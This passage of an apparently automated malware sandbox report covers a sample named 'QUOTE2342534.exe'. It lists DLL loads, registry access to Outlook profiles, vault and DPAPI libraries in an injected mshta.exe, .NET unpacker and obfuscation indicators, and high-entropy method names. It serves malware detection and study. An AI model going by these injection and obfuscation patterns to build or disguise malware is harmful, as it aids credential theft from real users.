            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\QUOTE2342534.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: QUOTE2342534.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: QUOTE2342534.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: QUOTE2342534.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: mshta.pdbGCTL source: QUOTE2342534.exe, 00000004.00000002.2232065125.0000000001197000.00000004.00000020.00020000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000002.4593662972.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qnPyaKsYTE.exe, 00000007.00000000.2154339993.000000000012E000.00000002.00000001.01000000.0000000C.sdmp, qnPyaKsYTE.exe, 0000000A.00000000.2297414318.000000000012E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: QUOTE2342534.exe, 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2232129759.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2233823345.000000000366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: iFFZ.pdbSHA256 source: QUOTE2342534.exe
            Source: Binary string: wntdll.pdb source: QUOTE2342534.exe, QUOTE2342534.exe, 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2232129759.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2233823345.000000000366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: iFFZ.pdb source: QUOTE2342534.exe
            Source: Binary string: mshta.pdb source: QUOTE2342534.exe, 00000004.00000002.2232065125.0000000001197000.00000004.00000020.00020000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000002.4593662972.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: QUOTE2342534.exe, formMain.cs.Net Code: InitializeComponent
            Source: 0.2.QUOTE2342534.exe.38e0b90.0.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, RgTGNHbnx4wRLD1BjK.cs.Net Code: uVluVFvwkb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, RgTGNHbnx4wRLD1BjK.cs.Net Code: uVluVFvwkb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.QUOTE2342534.exe.7080000.2.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
            Source: 8.2.mshta.exe.3eecd14.2.raw.unpack, formMain.cs.Net Code: InitializeComponent
            Source: 10.0.qnPyaKsYTE.exe.287cd14.1.raw.unpack, formMain.cs.Net Code: InitializeComponent
            Source: 10.2.qnPyaKsYTE.exe.287cd14.1.raw.unpack, formMain.cs.Net Code: InitializeComponent
            Source: 11.2.firefox.exe.2928cd14.0.raw.unpack, formMain.cs.Net Code: InitializeComponent
            Source: QUOTE2342534.exeStatic PE information: 0xD96D0FA5 [Sat Aug 4 22:41:41 2085 UTC]
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004118F3 push esp; iretd 4_2_00411926
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004118B0 push esp; iretd 4_2_00411926
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0041B2EA pushfd ; retf 4_2_0041B2ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004033D0 push eax; ret 4_2_004033D2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0040BCC7 push C1009F53h; ret 4_2_0040BCCE
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_00406567 push edx; iretd 4_2_00406568
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_004165BD pushfd ; retf 4_2_004165C1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0040863B push ebx; iretd 4_2_0040863C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0041E74B push ds; iretd 4_2_0041E74C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017209AD push ecx; mov dword ptr [esp], ecx4_2_017209B6
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_04192500 push eax; retf 7_2_0419250A
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_04197D71 pushfd ; retf 7_2_04197D74
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0418874E push C1009F53h; ret 7_2_04188755
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_04182FEE push edx; iretd 7_2_04182FEF
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_04193044 pushfd ; retf 7_2_04193048
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_041850C2 push ebx; iretd 7_2_041850C3
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0419B1D2 push ds; iretd 7_2_0419B1D3
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0418E337 push esp; iretd 7_2_0418E3AD
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeCode function: 7_2_0418E37A push esp; iretd 7_2_0418E3AD
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0381225F pushad ; ret 8_2_038127F9
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038127FA pushad ; ret 8_2_038127F9
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038409AD push ecx; mov dword ptr [esp], ecx8_2_038409B6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0381283D push eax; iretd 8_2_03812858
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03811200 push eax; iretd 8_2_03811369
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F2E4DD push esp; iretd 8_2_02F2E553
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F2E520 push esp; iretd 8_2_02F2E553
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F288F4 push C1009F53h; ret 8_2_02F288FB
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F408E4 push 9C6AA52Bh; iretd 8_2_02F40948
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F25268 push ebx; iretd 8_2_02F25269
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F3B378 push ds; iretd 8_2_02F3B379
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F331EA pushfd ; retf 8_2_02F331EE
            Source: QUOTE2342534.exeStatic PE information: section name: .text entropy: 7.948843186706725
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, s4g7xRntK7HFTBAmjj.csHigh entropy of concatenated method names: 'jERLPTU3Is', 'KelLOPnWq2', 'kaELVBuOLn', 'AQ1LrCNrXl', 'OH9LBKEGwN', 'QUDLwVXiPu', 'E2ELJuAVq7', 'pnmL9bQZ9w', 'VX1LqR5rH2', 'iweLsofJYh'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, RgTGNHbnx4wRLD1BjK.csHigh entropy of concatenated method names: 'bOACZ7hoBA', 'OtmCXXaMrV', 'O56Cm5Jya3', 'fsZCTZ9r7t', 'VbRC6BA0wC', 'OSFC0Ey1U8', 'oiXCLWo6q9', 'oQxCerMZTQ', 'xgKCADA3Ps', 'KKLCRJ9cVK'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, U4eIuf1F4uGthpELRy.csHigh entropy of concatenated method names: 'elFQRJGsnG', 'IReQGpka2J', 'ToString', 'YC9QXTjpGA', 'rBlQmTUCGh', 'A2GQTMgYB8', 'pmlQ66NyNZ', 'OfrQ0mKZar', 'CRSQLRlvl1', 'd1HQeLCK3i'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, oHNWP3xqOXnYKOwagv.csHigh entropy of concatenated method names: 'Uf5QbL79Gk', 'SulQI2yDY6', 'dDEklnIMKW', 'iLTko5fa6u', 'LclQ7SgRUP', 'xMaQDESP86', 'yQYQNGZNBf', 'kkUQ8HEQt5', 'PJvQalsL6Q', 'TQpQnwMihO'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, CA3vo9DeDOwaY5w3me.csHigh entropy of concatenated method names: 'jCUkXiFyBb', 'xjokmQuVH7', 'B0TkTrPLW4', 'YYik6JTvSZ', 'jn4k0Zkl7i', 'WAXkL4DxRj', 'efGkeayHiG', 'YLykADdnfY', 'PE3kRqfYJE', 'ztGkGrNgAg'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, TkT3gfvpRSNgErHQaQ.csHigh entropy of concatenated method names: 'COQKo2VQXn', 'aJZKCXly9h', 'APZKuS8AI4', 'wC5KX1vx5w', 'TjfKmvqOQ9', 'VCWK6lQbYH', 'pOCK09Sb21', 'Vd6kypE8TO', 'kL1kbOPfMP', 'hSbkHNLGPH'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, M6mAoGGtiWJ0hqSmA5.csHigh entropy of concatenated method names: 'Bqn0ZlnOW4', 'uPc0mUNE7t', 'zow06SJ65b', 'cV80LQCB5h', 'fBj0efLI6G', 'XTQ6t3Sfdt', 'xal6W8T3Z0', 'xTA6yWJ4LG', 'USQ6blctSG', 'wXH6H3iZQv'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, b9hATX05wLpDVq4ne4.csHigh entropy of concatenated method names: 'Wpam8p8GvI', 'QUUma7YGd6', 'XJQmnCbu5M', 'Vummd0Jwwm', 'EJJmt9gT7e', 'oIAmW20noQ', 'qfJmyox0XC', 'XEAmbIOfEP', 'PmvmHkOw4B', 'fFRmImPiCr'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, tU4IJD49cubmoRg8Gk.csHigh entropy of concatenated method names: 'qbrLXuNV6d', 'BGlLTf2Lqj', 's03L0hSMjE', 'yDn0ILXwv3', 'kiv0ztbKmL', 'LXSLl9ojlu', 'mhwLoLy6HV', 'XWOL4gskSn', 'UH0LCwTM7i', 'ERfLuEPdoL'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, cEVPWK7soYoDsnybXw.csHigh entropy of concatenated method names: 'JmCkcMFkSc', 'xCak5aaywZ', 'njokS7AsWJ', 'LiFkvrRVTU', 'VrYk8gWlRO', 'bwtkf7KmiE', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, pNb3QZTjfGM6vQZARU.csHigh entropy of concatenated method names: 'PHWF9P58AD', 'qmeFqcJo1h', 'lB4FcYJr0e', 'VBLF59K3dG', 'tSaFvOoLsJ', 'oCRFfeUp3Y', 'kd4FpZFfNv', 'e7BF3eHHDl', 'YjYFh5HBGX', 'yctF78leip'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, KF5bE15KD7itN7XHNN.csHigh entropy of concatenated method names: 'AsC6BbdvEg', 'US46JVGdmB', 'wpoTSXnpAM', 'VIWTvD5M97', 'BKUTf86v12', 'gT2T1P0A53', 'gIPTp3VVcw', 'd2bT3XbeW0', 'R8mTiHVX6r', 'F8bThdC0O9'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, eq4Yw4laQbFZQ9YnSO.csHigh entropy of concatenated method names: 'RoZVkdlMu', 'IokrI2xIv', 'eMTwJOlIR', 'FPYJOZwM1', 'B69qmsFlW', 'LLZsi39dd', 'Pb5plf9Mw2qk7fq5o9', 'CgQQv0Bf0t7u2kWcJL', 'En3kAwraB', 'GtaxBXyJr'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, ckyhrWsrr3WEVToDvX.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CM14HNvDn8', 'z0c4IL8aHr', 'vwE4zxwjNM', 'ES9Cl6ntWg', 'SrLCoh2uX7', 'gVLC4lXqRs', 'S6pCCfk4iJ', 'ypUnrNOOT0eR8E1IGZ2'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, QrrAevQFuxKJYAdplq.csHigh entropy of concatenated method names: 'Ww6oLGLa0H', 'gAkoeBjh4V', 'LnooR4wok8', 'bhjoGgB25N', 'jFcoYCFS4m', 'nF0oMX05gl', 'pDNlIw4hG8nXEKBIsd', 'iJ5wuISINQBspOb6u3', 'z7toolHUf2', 't4ooCm19sr'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, V6sh5ea6d9bGrdVyfIO.csHigh entropy of concatenated method names: 'tvrKPfVeqG', 'pDkKODuOed', 'z91KV4sPIb', 'sqEKrWJIpP', 'B9uKBhZ490', 'aToKwDuZwS', 'Wo9KJ8l2AR', 'vyyK95RFCb', 'io8KqWOHb5', 'XNtKsgNsDX'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, HksaVK8qpESfOv37Jt.csHigh entropy of concatenated method names: 'Dispose', 'qbmoHMRS2a', 'NKu45yTRQ2', 'O14UUhVcPK', 'XcXoIRE2kM', 'shtozseqIt', 'ProcessDialogKey', 'gwm4lbug0S', 'jLt4o1qYGj', 'ebW4467ukZ'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, antDFoW3jL51WwDMKQ.csHigh entropy of concatenated method names: 'oLOTrit6I1', 'xqqTwoUWGV', 'GX1T98kESU', 'hAmTqyc7NA', 'QjlTYT1VFa', 'HhXTMkmMED', 'jDSTQZQKma', 'gb3TkLfrh2', 'RB2TK1NgIc', 'Ka4Txx2noF'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, btQxbDHvSZeM3yABlR.csHigh entropy of concatenated method names: 'poPYhFkX4Q', 'KbbYDhvIjg', 'CB8Y8VtNu9', 'rocYa3wfac', 'DS7Y5bmfPr', 'BtvYS4RHYQ', 'm9cYvMBP4J', 'QyIYfieBFt', 'fhHY1hUXkE', 'URrYpgqs3k'
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, JvaI8SaRcvwgX0l9NJu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NfNx8vB03G', 'LHhxaZl2Mm', 'sENxn9F9lm', 'asKxdaMZPZ', 'qNhxtcFpCA', 'YZaxWcZPHF', 'VmFxy4FRLF'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, s4g7xRntK7HFTBAmjj.csHigh entropy of concatenated method names: 'jERLPTU3Is', 'KelLOPnWq2', 'kaELVBuOLn', 'AQ1LrCNrXl', 'OH9LBKEGwN', 'QUDLwVXiPu', 'E2ELJuAVq7', 'pnmL9bQZ9w', 'VX1LqR5rH2', 'iweLsofJYh'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, RgTGNHbnx4wRLD1BjK.csHigh entropy of concatenated method names: 'bOACZ7hoBA', 'OtmCXXaMrV', 'O56Cm5Jya3', 'fsZCTZ9r7t', 'VbRC6BA0wC', 'OSFC0Ey1U8', 'oiXCLWo6q9', 'oQxCerMZTQ', 'xgKCADA3Ps', 'KKLCRJ9cVK'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, U4eIuf1F4uGthpELRy.csHigh entropy of concatenated method names: 'elFQRJGsnG', 'IReQGpka2J', 'ToString', 'YC9QXTjpGA', 'rBlQmTUCGh', 'A2GQTMgYB8', 'pmlQ66NyNZ', 'OfrQ0mKZar', 'CRSQLRlvl1', 'd1HQeLCK3i'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, oHNWP3xqOXnYKOwagv.csHigh entropy of concatenated method names: 'Uf5QbL79Gk', 'SulQI2yDY6', 'dDEklnIMKW', 'iLTko5fa6u', 'LclQ7SgRUP', 'xMaQDESP86', 'yQYQNGZNBf', 'kkUQ8HEQt5', 'PJvQalsL6Q', 'TQpQnwMihO'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, CA3vo9DeDOwaY5w3me.csHigh entropy of concatenated method names: 'jCUkXiFyBb', 'xjokmQuVH7', 'B0TkTrPLW4', 'YYik6JTvSZ', 'jn4k0Zkl7i', 'WAXkL4DxRj', 'efGkeayHiG', 'YLykADdnfY', 'PE3kRqfYJE', 'ztGkGrNgAg'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, TkT3gfvpRSNgErHQaQ.csHigh entropy of concatenated method names: 'COQKo2VQXn', 'aJZKCXly9h', 'APZKuS8AI4', 'wC5KX1vx5w', 'TjfKmvqOQ9', 'VCWK6lQbYH', 'pOCK09Sb21', 'Vd6kypE8TO', 'kL1kbOPfMP', 'hSbkHNLGPH'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, M6mAoGGtiWJ0hqSmA5.csHigh entropy of concatenated method names: 'Bqn0ZlnOW4', 'uPc0mUNE7t', 'zow06SJ65b', 'cV80LQCB5h', 'fBj0efLI6G', 'XTQ6t3Sfdt', 'xal6W8T3Z0', 'xTA6yWJ4LG', 'USQ6blctSG', 'wXH6H3iZQv'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, b9hATX05wLpDVq4ne4.csHigh entropy of concatenated method names: 'Wpam8p8GvI', 'QUUma7YGd6', 'XJQmnCbu5M', 'Vummd0Jwwm', 'EJJmt9gT7e', 'oIAmW20noQ', 'qfJmyox0XC', 'XEAmbIOfEP', 'PmvmHkOw4B', 'fFRmImPiCr'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, tU4IJD49cubmoRg8Gk.csHigh entropy of concatenated method names: 'qbrLXuNV6d', 'BGlLTf2Lqj', 's03L0hSMjE', 'yDn0ILXwv3', 'kiv0ztbKmL', 'LXSLl9ojlu', 'mhwLoLy6HV', 'XWOL4gskSn', 'UH0LCwTM7i', 'ERfLuEPdoL'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, cEVPWK7soYoDsnybXw.csHigh entropy of concatenated method names: 'JmCkcMFkSc', 'xCak5aaywZ', 'njokS7AsWJ', 'LiFkvrRVTU', 'VrYk8gWlRO', 'bwtkf7KmiE', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, pNb3QZTjfGM6vQZARU.csHigh entropy of concatenated method names: 'PHWF9P58AD', 'qmeFqcJo1h', 'lB4FcYJr0e', 'VBLF59K3dG', 'tSaFvOoLsJ', 'oCRFfeUp3Y', 'kd4FpZFfNv', 'e7BF3eHHDl', 'YjYFh5HBGX', 'yctF78leip'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, KF5bE15KD7itN7XHNN.csHigh entropy of concatenated method names: 'AsC6BbdvEg', 'US46JVGdmB', 'wpoTSXnpAM', 'VIWTvD5M97', 'BKUTf86v12', 'gT2T1P0A53', 'gIPTp3VVcw', 'd2bT3XbeW0', 'R8mTiHVX6r', 'F8bThdC0O9'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, eq4Yw4laQbFZQ9YnSO.csHigh entropy of concatenated method names: 'RoZVkdlMu', 'IokrI2xIv', 'eMTwJOlIR', 'FPYJOZwM1', 'B69qmsFlW', 'LLZsi39dd', 'Pb5plf9Mw2qk7fq5o9', 'CgQQv0Bf0t7u2kWcJL', 'En3kAwraB', 'GtaxBXyJr'
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, ckyhrWsrr3WEVToDvX.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CM14HNvDn8', 'z0c4IL8aHr', 'vwE4zxwjNM', 'ES9Cl6ntWg', 'SrLCoh2uX7', 'gVLC4lXqRs', 'S6pCCfk4iJ', 'ypUnrNOOT0eR8E1IGZ2'
